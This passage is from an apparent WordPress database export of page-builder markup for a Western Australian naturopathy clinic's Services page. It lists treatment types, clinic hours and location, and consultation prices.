Sans\",\"weight\":\"600\",\"size\":\"60px\",\"lineHeight\":\"1.2em\"}},\"tablet\":{\"value\":{\"size\":\"42px\",\"lineHeight\":\"\"}},\"phone\":{\"value\":{\"size\":\"24px\",\"lineHeight\":\"1.4em\"}}}}},\"inlineFont\":{\"desktop\":{\"value\":{\"families\":[\"Montserrat\",\"Playfair Display\"]}}}},\"innerContent\":{\"desktop\":{\"value\":\"\\u003ch2\\u003e\\u003cspan style=\\u0022font-family: \'Playfair Display\'; font-weight: normal;\\u0022\\u003eTreatments\\u003c/span\\u003e\\u003c/h2\\u003e\\n\\u003cp\\u003e\\u003cspan style=\\u0022font-size: large; font-family: Montserrat;\\u0022\\u003eAs naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.\\u003c/span\\u003e\\u003c/p\\u003e\"}}},\"builderVersion\":\"5.0.0-public-beta.1\",\"locked\":{\"desktop\":{\"value\":\"off\"}}} /-->\n<!-- /wp:divi/column -->\n<!-- /wp:divi/row -->\n\n<!-- wp:divi/row {\"module\":{\"advanced\":{\"columnStructure\":{\"desktop\":{\"value\":\"1_3,1_3,1_3\"}},\"gutter\":{\"desktop\":{\"value\":{\"enable\":\"on\",\"width\":\"1\",\"makeEqual\":\"on\"}}}},\"decoration\":{\"background\":{\"desktop\":{\"value\":{\"color\":\"#ffffff\"}}},\"sizing\":{\"desktop\":{\"value\":{\"minHeight\":\"425px\"}}},\"spacing\":{\"desktop\":{\"value\":{\"margin\":{\"top\":\"-1px\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"syncVertical\":\"off\",\"syncHorizontal\":\"off\"},\"padding\":{\"top\":\"0px\",\"right\":\"\",\"bottom\":\"0px\",\"left\":\"\",\"syncVertical\":\"on\",\"syncHorizontal\":\"off\"}}},\"tablet\":{\"value\":{\"margin\":{\"top\":\"0px\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"syncVertical\":\"off\",\"syncHorizontal\":\"off\"}}},\"phone\":{\"value\":{\"margin\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"syncVertical\":\"off\",\"syncHorizontal\":\"off\"}}}},\"boxShadow\":{\"desktop\":{\"value\":{\"style\":\"preset2\",\"color\":\"#000000\"}}},\"layout\":{\"desktop\":{\"value\":{\"display\":\"block\"}}}}},\"builderVersion\":\"4.9.4\"} -->\n<!-- wp:divi/column {\"module\":{\"advanced\":{\"type\":{\"desktop\":{\"value\":\"1_3\"}}},\"decoration\":{\"background\":{\"desktop\":{\"value\":{\"enableColor\":\"off\",\"color\":\"\"}}},\"spacing\":{\"desktop\":{\"value\":{\"padding\":{\"top\":\"60px\",\"right\":\"20px\",\"bottom\":\"60px\",\"left\":\"20px\",\"syncVertical\":\"on\",\"syncHorizontal\":\"on\"}}},\"tablet\":{\"value\":{\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"syncVertical\":\"off\",\"syncHorizontal\":\"off\"}}},\"phone\":{\"value\":{\"padding\":{\"top\":\"30px\",\"right\":\"\",\"bottom\":\"30px\",\"left\":\"\",\"syncVertical\":\"on\",\"syncHorizontal\":\"off\"}}}},\"border\":{\"desktop\":{\"value\":{\"styles\":{\"all\":{\"width\":\"1px\"}}}}},\"layout\":{\"desktop\":{\"value\":{\"display\":\"block\"}}}}},\"builderVersion\":\"4.4.8\"} -->\n<!-- wp:divi/blurb {\"imageIcon\":{\"innerContent\":{\"desktop\":{\"value\":{\"src\":\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\"}}},\"decoration\":{\"animation\":{\"desktop\":{\"value\":{\"style\":\"none\",\"direction\":\"top\",\"intensity\":{\"slide\":\"2\"},\"duration\":\"600ms\"}}}}},\"module\":{\"advanced\":{\"text\":{\"text\":{\"desktop\":{\"value\":{\"orientation\":\"center\"}}}}},\"decoration\":{\"layout\":{\"desktop\":{\"value\":{\"display\":\"block\"}}}}},\"title\":{\"innerContent\":{\"desktop\":{\"value\":{\"text\":\"Herbal medicine\"}}},\"decoration\":{\"font\":{\"font\":{\"desktop\":{\"value\":{\"family\":\"Playfair Display\",\"weight\":\"600\",\"size\":\"22px\",\"lineHeight\":\"1.4em\"}},\"tablet\":{\"value\":{\"size\":\"20px\",\"lineHeight\":\"\"}},\"phone\":{\"value\":{\"size\":\"18px\",\"lineHeight\":\"1.8em\"}}}}}},\"content\":{\"decoration\":{\"bodyFont\":{\"body\":{\"font\":{\"desktop\":{\"value\":{\"family\":\"Montserrat\",\"size\":\"16px\",\"lineHeight\":\"1.8em\"}},\"tablet\":{\"value\":{\"size\":\"\"}},\"phone\":{\"value\":{\"size\":\"14px\"}}}}},\"inlineFont\":{\"desktop\":{\"value\":{\"families\":[\"Montserrat\"]}}}},\"innerContent\":{\"desktop\":{\"value\":\"\\u003cspan style=\\u0022font-family: Montserrat;\\u0022\\u003eLiquid herbal blends\\u003c/span\\u003e\\nCapsules/tablets\\nTeas\\nTopical creams\"}}},\"builderVersion\":\"5.1.1\",\"locked\":{\"desktop\":{\"value\":\"off\"}}} /-->\n<!-- /wp:divi/column -->\n\n<!-- wp:divi/column {\"module\":{\"advanced\":{\"type\":{\"desktop\":{\"value\":\"1_3\"}}},\"decoration\":{\"background\":{\"desktop\":{\"value\":{\"enableColor\":\"off\",\"color\":\"\"}}},\"spacing\":{\"desktop\":{\"value\":{\"padding\":{\"top\":\"60px\",\"right\":\"20px\",\"bottom\":\"60px\",\"left\":\"20px\",\"syncVertical\":\"on\",\"syncHorizontal\":\"on\"}}},\"tablet\":{\"value\":{\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"syncVertical\":\"off\",\"syncHorizontal\":\"off\"}}},\"phone\":{\"value\":{\"padding\":{\"top\":\"30px\",\"right\":\"\",\"bottom\":\"30px\",\"left\":\"\",\"syncVertical\":\"on\",\"syncHorizontal\":\"off\"}}}},\"border\":{\"desktop\":{\"value\":{\"styles\":{\"all\":{\"width\":\"1px\"}}}}},\"layout\":{\"desktop\":{\"value\":{\"display\":\"block\"}}}}},\"builderVersion\":\"4.4.8\"} -->\n<!-- wp:divi/blurb {\"imageIcon\":{\"innerContent\":{\"desktop\":{\"value\":{\"src\":\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\"}}},\"decoration\":{\"animation\":{\"desktop\":{\"value\":{\"style\":\"none\",\"direction\":\"top\",\"intensity\":{\"slide\":\"2\"},\"duration\":\"600ms\"}}}}},\"module\":{\"advanced\":{\"text\":{\"text\":{\"desktop\":{\"value\":{\"orientation\":\"center\"}}}}},\"decoration\":{\"layout\":{\"desktop\":{\"value\":{\"display\":\"block\"}}}}},\"title\":{\"innerContent\":{\"desktop\":{\"value\":{\"text\":\"Nutritional medicine\"}}},\"decoration\":{\"font\":{\"font\":{\"desktop\":{\"value\":{\"family\":\"Playfair Display\",\"weight\":\"600\",\"size\":\"22px\",\"lineHeight\":\"1.4em\"}},\"tablet\":{\"value\":{\"size\":\"20px\",\"lineHeight\":\"\"}},\"phone\":{\"value\":{\"size\":\"18px\",\"lineHeight\":\"1.8em\"}}}}}},\"content\":{\"decoration\":{\"bodyFont\":{\"body\":{\"font\":{\"desktop\":{\"value\":{\"family\":\"Muli\",\"size\":\"16px\",\"lineHeight\":\"1.8em\"}},\"tablet\":{\"value\":{\"size\":\"\"}},\"phone\":{\"value\":{\"size\":\"14px\"}}}}},\"inlineFont\":{\"desktop\":{\"value\":{\"families\":[\"Montserrat\"]}}}},\"innerContent\":{\"desktop\":{\"value\":\"\\u003cspan style=\\u0022font-family: Montserrat;\\u0022\\u003eFood as medicine\\u003c/span\\u003e\\n\\u003cspan style=\\u0022font-family: Montserrat;\\u0022\\u003eNutritional compounds\\u003c/span\\u003e\\n\\u003cspan style=\\u0022font-family: Montserrat;\\u0022\\u003eSupplements\\u003c/span\\u003e\"}}},\"builderVersion\":\"5.1.1\",\"locked\":{\"desktop\":{\"value\":\"off\"}}} /-->\n<!-- /wp:divi/column -->\n\n<!-- wp:divi/column {\"module\":{\"advanced\":{\"type\":{\"desktop\":{\"value\":\"1_3\"}}},\"decoration\":{\"background\":{\"desktop\":{\"value\":{\"enableColor\":\"off\",\"color\":\"\"}}},\"spacing\":{\"desktop\":{\"value\":{\"padding\":{\"top\":\"60px\",\"right\":\"20px\",\"bottom\":\"60px\",\"left\":\"20px\",\"syncVertical\":\"on\",\"syncHorizontal\":\"on\"}}},\"tablet\":{\"value\":{\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"syncVertical\":\"off\",\"syncHorizontal\":\"off\"}}},\"phone\":{\"value\":{\"padding\":{\"top\":\"30px\",\"right\":\"\",\"bottom\":\"30px\",\"left\":\"\",\"syncVertical\":\"on\",\"syncHorizontal\":\"off\"}}}},\"border\":{\"desktop\":{\"value\":{\"styles\":{\"all\":{\"width\":\"1px\"}}}}},\"layout\":{\"desktop\":{\"value\":{\"display\":\"block\"}}}}},\"builderVersion\":\"4.4.8\"} -->\n<!-- wp:divi/blurb {\"imageIcon\":{\"innerContent\":{\"desktop\":{\"value\":{\"src\":\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\",\"id\":\"118\",\"alt\":\"\",\"titleText\":\"1-01\",\"width\":\"80\",\"height\":\"140\"}}},\"decoration\":{\"animation\":{\"desktop\":{\"value\":{\"style\":\"none\",\"direction\":\"top\",\"intensity\":{\"slide\":\"2\"},\"duration\":\"600ms\"}}}}},\"module\":{\"advanced\":{\"text\":{\"text\":{\"desktop\":{\"value\":{\"orientation\":\"center\"}}}}},\"decoration\":{\"layout\":{\"desktop\":{\"value\":{\"display\":\"block\"}}},\"attributes\":{\"attributes\":[{\"id\":\"p594hwr9rb\",\"name\":\"title\",\"value\":\"1-01\",\"adminLabel\":\"Image Title\",\"targetElement\":\"imageIcon\"}],\"desktop\":{\"value\":{\"attributes\":[{\"id\":\"p594hwr9rb\",\"name\":\"title\",\"value\":\"1-01\",\"adminLabel\":\"Image Title\",\"targetElement\":\"imageIcon\"}]}}}}},\"title\":{\"innerContent\":{\"desktop\":{\"value\":{\"text\":\"Lifestyle \"}}},\"decoration\":{\"font\":{\"font\":{\"desktop\":{\"value\":{\"family\":\"Playfair Display\",\"weight\":\"600\",\"size\":\"22px\",\"lineHeight\":\"1.4em\"}},\"tablet\":{\"value\":{\"size\":\"20px\",\"lineHeight\":\"\"}},\"phone\":{\"value\":{\"size\":\"18px\",\"lineHeight\":\"1.8em\"}}}}}},\"content\":{\"decoration\":{\"bodyFont\":{\"body\":{\"font\":{\"desktop\":{\"value\":{\"family\":\"Muli\",\"size\":\"16px\",\"lineHeight\":\"1.8em\"}},\"tablet\":{\"value\":{\"size\":\"\"}},\"phone\":{\"value\":{\"size\":\"14px\"}}}}},\"inlineFont\":{\"desktop\":{\"value\":{\"families\":[\"Montserrat\"]}}}},\"innerContent\":{\"desktop\":{\"value\":\"\\u003cp\\u003e\\u003cspan style=\\u0022font-family: Montserrat;\\u0022\\u003eStress strategies\\u003c/span\\u003e\\u003cbr /\\u003e\\u003cspan style=\\u0022font-family: Montserrat;\\u0022\\u003eExercise and movement\\u003c/span\\u003e\\u003cbr /\\u003e\\u003cspan style=\\u0022font-family: Montserrat;\\u0022\\u003eMindfulness \\u003c/span\\u003e\\u003cbr /\\u003e\\u003cspan style=\\u0022font-family: Montserrat;\\u0022\\u003eSleep hygiene\\u003c/span\\u003e\\u003c/p\\u003e\"}}},\"builderVersion\":\"5.1.1\",\"locked\":{\"desktop\":{\"value\":\"off\"}}} /-->\n<!-- /wp:divi/column -->\n<!-- /wp:divi/row -->\n\n<!-- wp:divi/row {\"module\":{\"decoration\":{\"layout\":{\"desktop\":{\"value\":{\"display\":\"block\"}}}}},\"builderVersion\":\"4.9.4\",\"modulePreset\":[\"default\"]} -->\n<!-- wp:divi/column {\"module\":{\"advanced\":{\"type\":{\"desktop\":{\"value\":\"4_4\"}}},\"decoration\":{\"layout\":{\"desktop\":{\"value\":{\"display\":\"block\"}}}}},\"builderVersion\":\"4.9.4\",\"modulePreset\":[\"default\"]} /-->\n<!-- /wp:divi/row -->\n<!-- /wp:divi/section -->\n\n<!-- wp:divi/section {\"module\":{\"meta\":{\"adminLabel\":{\"desktop\":{\"value\":\"Feature\"}}},\"decoration\":{\"background\":{\"desktop\":{\"value\":{\"image\":{\"parallax\":{\"enabled\":\"on\"}}}}},\"spacing\":{\"desktop\":{\"value\":{\"padding\":{\"top\":\"7px\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"syncVertical\":\"off\",\"syncHorizontal\":\"off\"}}}},\"layout\":{\"desktop\":{\"value\":{\"display\":\"block\"}}}}},\"builderVersion\":\"5.0.0-public-alpha.18.2\"} -->\n<!-- wp:divi/row {\"module\":{\"decoration\":{\"spacing\":{\"desktop\":{\"value\":{\"margin\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"syncVertical\":\"off\",\"syncHorizontal\":\"off\"}}}},\"layout\":{\"desktop\":{\"value\":{\"display\":\"block\"}}}}},\"builderVersion\":\"4.9.4\",\"modulePreset\":[\"default\"]} -->\n<!-- wp:divi/column {\"module\":{\"advanced\":{\"type\":{\"desktop\":{\"value\":\"4_4\"}}},\"decoration\":{\"layout\":{\"desktop\":{\"value\":{\"display\":\"block\"}}}}},\"builderVersion\":\"4.9.4\",\"modulePreset\":[\"default\"]} -->\n<!-- wp:divi/text {\"module\":{\"advanced\":{\"text\":{\"text\":{\"desktop\":{\"value\":{\"orientation\":\"center\"}}}}},\"decoration\":{\"sizing\":{\"desktop\":{\"value\":{\"maxWidth\":\"700px\",\"alignment\":\"center\"}}},\"spacing\":{\"desktop\":{\"value\":{\"margin\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"20px\",\"left\":\"\",\"syncVertical\":\"off\",\"syncHorizontal\":\"off\"},\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"0px\",\"left\":\"\",\"syncVertical\":\"off\",\"syncHorizontal\":\"off\"}}}},\"layout\":{\"desktop\":{\"value\":{\"display\":\"block\"}}}}},\"content\":{\"decoration\":{\"bodyFont\":{\"body\":{\"font\":{\"desktop\":{\"value\":{\"family\":\"Muli\",\"size\":\"16px\",\"lineHeight\":\"1.8em\"}},\"tablet\":{\"value\":{\"size\":\"\"}},\"phone\":{\"value\":{\"size\":\"14px\"}}}}},\"headingFont\":{\"h2\":{\"font\":{\"desktop\":{\"value\":{\"family\":\"Josefin Sans\",\"weight\":\"600\",\"size\":\"60px\",\"lineHeight\":\"1.2em\"}},\"tablet\":{\"value\":{\"size\":\"42px\",\"lineHeight\":\"\"}},\"phone\":{\"value\":{\"size\":\"24px\",\"lineHeight\":\"1.4em\"}}}}},\"inlineFont\":{\"desktop\":{\"value\":{\"families\":[\"Playfair Display\"]}}}},\"innerContent\":{\"desktop\":{\"value\":\"\\u003ch2\\u003e\\u003cspan style=\\u0022font-family: \'Playfair Display\'; color: #000000;\\u0022\\u003eClinic info\\u003c/span\\u003e\\u003c/h2\\u003e\"}}},\"builderVersion\":\"5.0.0-public-beta.1\",\"locked\":{\"desktop\":{\"value\":\"off\"}}} /-->\n<!-- /wp:divi/column -->\n<!-- /wp:divi/row -->\n\n<!-- wp:divi/row {\"module\":{\"advanced\":{\"columnStructure\":{\"desktop\":{\"value\":\"1_3,1_3,1_3\"}}},\"decoration\":{\"layout\":{\"desktop\":{\"value\":{\"display\":\"block\"}}}}},\"builderVersion\":\"4.4.7\"} -->\n<!-- wp:divi/column {\"module\":{\"advanced\":{\"type\":{\"desktop\":{\"value\":\"1_3\"}}},\"decoration\":{\"layout\":{\"desktop\":{\"value\":{\"display\":\"block\"}}}}},\"builderVersion\":\"4.4.7\"} -->\n<!-- wp:divi/text {\"module\":{\"advanced\":{\"text\":{\"text\":{\"desktop\":{\"value\":{\"orientation\":\"center\"}}}}},\"decoration\":{\"spacing\":{\"desktop\":{\"value\":{\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"3px\",\"left\":\"\",\"syncVertical\":\"off\",\"syncHorizontal\":\"off\"}}}},\"layout\":{\"desktop\":{\"value\":{\"display\":\"block\"}}}}},\"content\":{\"decoration\":{\"bodyFont\":{\"body\":{\"font\":{\"desktop\":{\"value\":{\"family\":\"Muli\",\"size\":\"16px\",\"lineHeight\":\"1.8em\"}},\"tablet\":{\"value\":{\"size\":\"\"}},\"phone\":{\"value\":{\"size\":\"14px\"}}}}},\"headingFont\":{\"h3\":{\"font\":{\"desktop\":{\"value\":{\"family\":\"Josefin Sans\",\"lineHeight\":\"1.4em\"}},\"tablet\":{\"value\":{\"size\":\"20px\",\"lineHeight\":\"\"}},\"phone\":{\"value\":{\"size\":\"18px\",\"lineHeight\":\"1.8em\"}}}}},\"inlineFont\":{\"desktop\":{\"value\":{\"families\":[\"Montserrat\",\"Playfair Display\"]}}}},\"innerContent\":{\"desktop\":{\"value\":\"\\u003ch3\\u003e\\u003cstrong\\u003e\\u003cspan style=\\u0022font-family: \'Playfair Display\';\\u0022\\u003eLocation\\u003c/span\\u003e\\u003c/strong\\u003e\\u003c/h3\\u003e\\n\\u003cp\\u003e\\u003cspan style=\\u0022font-family: Montserrat;\\u0022\\u003eKalamunda \\u0026amp; online\\u003c/span\\u003e\\u003c/p\\u003e\"}}},\"builderVersion\":\"5.0.0-public-beta.1\",\"locked\":{\"desktop\":{\"value\":\"off\"}}} /-->\n<!-- /wp:divi/column -->\n\n<!-- wp:divi/column {\"module\":{\"advanced\":{\"type\":{\"desktop\":{\"value\":\"1_3\"}}},\"decoration\":{\"layout\":{\"desktop\":{\"value\":{\"display\":\"block\"}}}}},\"builderVersion\":\"4.4.7\"} -->\n<!-- wp:divi/text {\"module\":{\"advanced\":{\"text\":{\"text\":{\"desktop\":{\"value\":{\"orientation\":\"center\"}}}}},\"decoration\":{\"layout\":{\"desktop\":{\"value\":{\"display\":\"block\"}}}}},\"content\":{\"decoration\":{\"bodyFont\":{\"body\":{\"font\":{\"desktop\":{\"value\":{\"family\":\"Muli\",\"size\":\"16px\",\"lineHeight\":\"1.8em\"}},\"tablet\":{\"value\":{\"size\":\"\"}},\"phone\":{\"value\":{\"size\":\"14px\"}}}}},\"headingFont\":{\"h3\":{\"font\":{\"desktop\":{\"value\":{\"family\":\"Josefin Sans\",\"lineHeight\":\"1.4em\"}},\"tablet\":{\"value\":{\"size\":\"20px\",\"lineHeight\":\"\"}},\"phone\":{\"value\":{\"size\":\"18px\",\"lineHeight\":\"1.8em\"}}}}}},\"innerContent\":{\"desktop\":{\"value\":\"\\u003ch3\\u003e\\u003c/h3\\u003e\"}}},\"builderVersion\":\"5.0.0-public-beta.1\",\"locked\":{\"desktop\":{\"value\":\"off\"}}} /-->\n\n<!-- wp:divi/button {\"module\":{\"advanced\":{\"alignment\":{\"desktop\":{\"value\":\"center\"}},\"text\":{\"text\":{\"desktop\":{\"value\":{\"color\":\"dark\"}}}}},\"decoration\":{\"spacing\":{\"desktop\":{\"value\":{\"padding\":{\"top\":\"15px\",\"right\":\"40px\",\"bottom\":\"15px\",\"left\":\"40px\",\"syncVertical\":\"on\",\"syncHorizontal\":\"on\"}}}},\"layout\":{\"desktop\":{\"value\":{\"display\":\"block\"}}}}},\"button\":{\"innerContent\":{\"desktop\":{\"value\":{\"linkUrl\":\"https://verdenaturopathy.com.au/bookings\",\"text\":\"Make a booking\"}}},\"decoration\":{\"button\":{\"desktop\":{\"value\":{\"enable\":\"on\"}}},\"font\":{\"font\":{\"desktop\":{\"value\":{\"size\":\"22px\",\"color\":\"#000000\",\"family\":\"Montserrat\",\"weight\":\"600\"}},\"tablet\":{\"value\":{\"size\":\"18px\"}},\"phone\":{\"value\":{\"size\":\"14px\"}}}},\"background\":{\"desktop\":{\"value\":{\"color\":\"$variable({\\u0022type\\u0022:\\u0022color\\u0022,\\u0022value\\u0022:{\\u0022name\\u0022:\\u0022gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\\u0022,\\u0022settings\\u0022:{}}})$\"}}},\"border\":{\"desktop\":{\"value\":{\"styles\":{\"all\":{\"width\":\"2px\",\"color\":\"#000000\"}},\"radius\":{\"sync\":\"on\",\"topLeft\":\"50px\",\"topRight\":\"50px\",\"bottomRight\":\"50px\",\"bottomLeft\":\"50px\"}}}}}},\"builderVersion\":\"5.0.0-public-beta.1\",\"locked\":{\"desktop\":{\"value\":\"off\"}}} /-->\n<!-- /wp:divi/column -->\n\n<!-- wp:divi/column {\"module\":{\"advanced\":{\"type\":{\"desktop\":{\"value\":\"1_3\"}}},\"decoration\":{\"layout\":{\"desktop\":{\"value\":{\"display\":\"block\"}}}}},\"builderVersion\":\"4.4.7\"} -->\n<!-- wp:divi/text {\"module\":{\"advanced\":{\"text\":{\"text\":{\"desktop\":{\"value\":{\"orientation\":\"center\"}}}}},\"decoration\":{\"layout\":{\"desktop\":{\"value\":{\"display\":\"block\"}}}}},\"content\":{\"decoration\":{\"bodyFont\":{\"body\":{\"font\":{\"desktop\":{\"value\":{\"family\":\"Muli\",\"size\":\"16px\",\"lineHeight\":\"1.8em\"}},\"tablet\":{\"value\":{\"size\":\"\"}},\"phone\":{\"value\":{\"size\":\"14px\"}}}}},\"headingFont\":{\"h3\":{\"font\":{\"desktop\":{\"value\":{\"family\":\"Josefin Sans\",\"lineHeight\":\"1.4em\"}},\"tablet\":{\"value\":{\"size\":\"20px\",\"lineHeight\":\"\"}},\"phone\":{\"value\":{\"size\":\"18px\",\"lineHeight\":\"1.8em\"}}}}},\"inlineFont\":{\"desktop\":{\"value\":{\"families\":[\"Montserrat\",\"Playfair Display\"]}}}},\"innerContent\":{\"desktop\":{\"value\":\"\\u003ch3\\u003e\\u003c/h3\\u003e\\n\\u003ch3\\u003e\\u003cstrong\\u003e\\u003cspan style=\\u0022font-family: \'Playfair Display\';\\u0022\\u003eClinic Hours\\u003c/span\\u003e\\u003c/strong\\u003e\\u003c/h3\\u003e\\n\\u003cp\\u003e\\u003cspan style=\\u0022font-family: Montserrat;\\u0022\\u003eTues/Wed: 9am-4pm\\u003c/span\\u003e\\u003cbr /\\u003e\\u003cspan style=\\u0022font-family: Montserrat;\\u0022\\u003eThurs: 11am-7pm\\u003c/span\\u003e\\u003cbr /\\u003e\\u003cspan style=\\u0022font-family: Montserrat;\\u0022\\u003eSaturday: 9:30am-1pm\\u003c/span\\u003e\\u003c/p\\u003e\"}}},\"builderVersion\":\"5.0.0-public-beta.1\",\"locked\":{\"desktop\":{\"value\":\"off\"}}} /-->\n<!-- /wp:divi/column -->\n<!-- /wp:divi/row -->\n<!-- /wp:divi/section --><!-- /wp:divi/placeholder -->','Services','','publish','closed','open','','services','','','2026-05-28 11:21:33','2026-05-28 03:21:33','',0,'https://verdenaturopathy.com.au/?page_id=424',0,'page','',0),(488,1,'2025-10-02 10:49:22','2025-10-02 02:49:22','[et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" overflow-x=\"hidden\" overflow-y=\"hidden\" custom_padding=\"||0px|||\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Naturopathic consults</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" border_radii=\"off||||\" box_shadow_style=\"preset2\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial (60 min) - $190\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span>\n\n<span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span>\n\n<span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up (30 min) - $95\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on.</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" width=\"100%\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express (20 min) - $65\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span> Existing clients only.[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" 